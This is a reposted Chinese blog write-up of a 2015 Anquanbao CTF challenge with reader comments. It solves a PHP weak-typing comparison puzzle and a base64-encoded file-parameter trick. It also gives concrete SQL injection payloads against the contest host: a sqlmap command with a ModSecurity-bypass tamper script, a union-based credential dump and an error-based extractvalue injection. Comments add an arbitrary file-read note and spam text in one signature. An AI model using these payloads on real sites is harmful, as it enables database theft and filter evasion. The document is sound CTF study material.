安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网

时间: 2020-10-10|tag: 28次围观|0 条评论

地址:http://yuebaomei.com/ 

如下图 
安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图 
首先咱是男同胞,就选男咯 

然后问你为什么现有男人 
安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图1 

当然是因为先生啊 

此时就要输入答案了,让你在本也中找,打开页面源码,毛都没有 
然后打开调试,在js里面找找 
果然找到了一个暧昧的字符串:wo ai anquanbao 
安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图2 

然后输入,果然弄对了。。。 
安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图3 

然后就是下一题了,应该是一个图片,但是被限制访问了 
安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图4 

这里卡了一下,去找什么绕过工具了,搞了半天不行啊 
然后有打开调试,看到有一个请求: 
http://yuebaomei.com/show.php?p=dGlzaGkucG5n
安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图5 

提示了yuehui.png,直接访问这个是不行的 
然后注意到上面那个连接的p参数值,base64解码后是tishi.png 
那么就知道了这个yuehui.png应该是一个最终的图片,我们也base64编码一下 
其实在上面的图片就已经提示你了,yuehui.png了 
http://yuebaomei.com/show.php?p=dGlzaGkucG5n 
http://yuebaomei.com/show.php?p=tishi.png 
http://yuebaomei.com/show.php?p=yuehui.png 
http://yuebaomei.com/show.php?p=eXVlaHVpLnBuZw==

然后访问最后的url: 
http://yuebaomei.com/show.php?p=eXVlaHVpLnBuZw==最后就跳转到了正确的页面了 
安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图6 

此时你已经可以和宝妹约会了,嘿嘿~~ 

看到后面还有终极大奖,然后就继续答题,看看是啥大奖。。。 

后面有3中类型的题,我们选代码审计 
安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图7 

这里有代码提示: 
http://q5c.yuebaomei.com/ 

$flag = "THIS IS FLAG"; 

if  ("POST" == $_SERVER['REQUEST_METHOD']) 
{ 
$password = $_POST['password']; 
if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password)) 
{ 
echo 'Wrong Format'; 
exit; 
} 

while (TRUE) 
{ 
$reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/'; 
if (6 > preg_match_all($reg, $password, $arr)) 
break; 

$c = 0; 
$ps = array('punct', 'digit', 'upper', 'lower'); 
foreach ($ps as $pt) 
{ 
if (preg_match("/[[:$pt:]]+/", $password)) 
$c += 1; 
} 

if ($c < 3) break; 
if ("42" == $password) echo $flag; 
else echo 'Wrong password'; 
exit; 
} 
} 
?>

这里的意思就是: 
接收post参数password的值 
必须满足12位以上字符 
必须是非空格非TAB之外的内容([:graph:]代表printable and visible的字符,鸟哥书上说是除空格符(空格键与[TAB]键)之外的所有按键) 
然后就是你的password要有大小写数字,字符内容,而且匹配到的次数要大于6次 
最后才是这里的考点: 
if ("42" == $password) echo $flag; 
else echo 'Wrong password';

乍一看这里的password怎么等于42咧,还有人说这写错了。。。 
其实这里使用fuzz就好了,你就让他满足上面的规则慢慢跑就行了 
首先你想到,什么东西能等于42咧? 
我能想到的: 
var_dump("42" == "0x2a"); 
var_dump("42" == "42.0e");

然后第一个试了好几次没成功 
使用第二个 
var_dump("42" == "42.0e0000"); 
var_dump("42" == "42.00e0000"); 
var_dump("42" == "42.00e+"); 
var_dump("42" == "42.00e+00000000000);

ok,最后的答案就是:42.00e+00000000000 
当然也可以这样:420.000000000e-1 
然后们在http://q5c.yuebaomei.com/页面输入上面的答案,得到: 
women ai baomei 
安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图8 

看到这个答案也是醉了。。。。 
最后在输入答案women ai baomei就过关了 

安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图9 

然后是sql注入和android的题,android的题不会做 
chu牛谁sql注入的可以这样: 
python ./sqlmap.py -u "http://yuebaomei.ztx.io/login" --data "username=admin&password=a" --tamper=modsecurityversioned.py -D test -T users --sql-shell

晚上回去测试的时候,题目已经加固不行了。。。 

大牛们还有啥好技巧放出来,还有其他两个类型的题,已经人做出来了的,来分享一下

分享到:2

 

27 个回复 安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图10 1#Chu (学习ing。)  安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图11 | 2015-02-13 16:51

sql 最开始挺简单的,手测内联注释可以过,然后就直接 tamper 了。后来木有看... 审计的.. 无耻的拉个点击率, http://sh3ll.me/2015/02/12/php-weak-typing/,之前 drops 里有看到.

安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图12 2#My5t3ry  安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图11 | 2015-02-13 16:52

发下我的,php代码审计的
+42.0000000000e0
SQL注入:
username=admin\&password=union/*!50000select*/1,group_concat(username,0x7c,password),3/*!50000from*/users%23

安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图13 3#Tea (◆冃.狌.交.伖,释.鲂.压.劦、棑.解.漃.瘼◆ 真 人】视||频. █网.址:wWw. wooyun.Org◆@程序员段子 xSsEr@Wooyun ┋◆冃.狌.交.伖,释.鲂.压.劦、棑.解.漃.瘼◆ 真 人】视||频. █网.址:zOnE.wooyun.Org◆┋)  安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图11 | 2015-02-13 16:53

昨天可以。
username=1',extractvalue(1,concat(0x7e,(select{x password}from{x test.users} where username='admin'))))#&password=111
这样。
http://zone.wooyun.org/content/18601

安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图13 4#Tea (◆冃.狌.交.伖,释.鲂.压.劦、棑.解.漃.瘼◆ 真 人】视||频. █网.址:wWw. wooyun.Org◆@程序员段子 xSsEr@Wooyun ┋◆冃.狌.交.伖,释.鲂.压.劦、棑.解.漃.瘼◆ 真 人】视||频. █网.址:zOnE.wooyun.Org◆┋)  安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图11 | 2015-02-13 16:54

@My5t3ry +42.0e000000一路值。。

安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图12 5#My5t3ry  安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图11 | 2015-02-13 17:05

另外那个http://yuebaomei.com/show.php可以读任意文件源码,
show.php/check.php等

安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图12 6# 回复此人 感谢 My5t3ry  安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网插图11 | 2015-02-13 17:06

 

 $q = $_POST["q"];
  $a = $_POST["a"];

  $pkey_path = "/path/to/rsa/private/key";

  function check_question_number($num)
  {
    $arr = array("1", "2", "3");
    foreach ($arr as $n)
    {
      if (!strcmp($num, $n))
        return TRUE;
    }

    return FALSE;
  }

  $ans = array("answer1", "answer2", "answer3");

  $response = array( "success" => FALSE, "data" => array("code" => "0"), "message" => "" );

  if (NULL == $q or NULL == $a)
  {
    $response["success"] = FALSE;
    $response["message"] = "empty parameter";
  }
  else if (!check_question_number($q))
  {
    $response["success"] = FALSE;
    $response["message"] = "wrong parameter";
  }
  else
  {
    $answer = $ans[$q - 1];
    if (!strcmp($a, $answer))
    {
      $private_key = openssl_pkey_get_private(file_get_contents($pkey_path));
      $strong = TRUE;
      $token = "AQB:" . base64_encode(openssl_random_pseudo_bytes(12, $strong));

      openssl_private_encrypt($token, $verify_code, $private_key);

      $response["success"] = TRUE;
      $response["data"]["code"] = base64_encode($verify_code);
      $response["message"] = "ok";
    }
    else
    {
      $response["success"] = FALSE;
      $response["message"] = "WRONG ANSWER";
    }
  }

  header("Content-Type: application/json");
  echo json_encode($response);
?>

昨天读了check.php开始挺高兴,然后就没有然后了。。。。。。。。
    上一篇: CVE-2011-2461原理分析及案例 - 网站安全 - 自学php网

    下一篇: 深圳航空可越权查看电粉信息(姓名、身份证、联系电话等敏感信息) - 网站安全 - 自学php网
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《安全宝约宝妹之代码审计题解 – 网站安全 – 自学php网
   

还没有人抢沙发呢~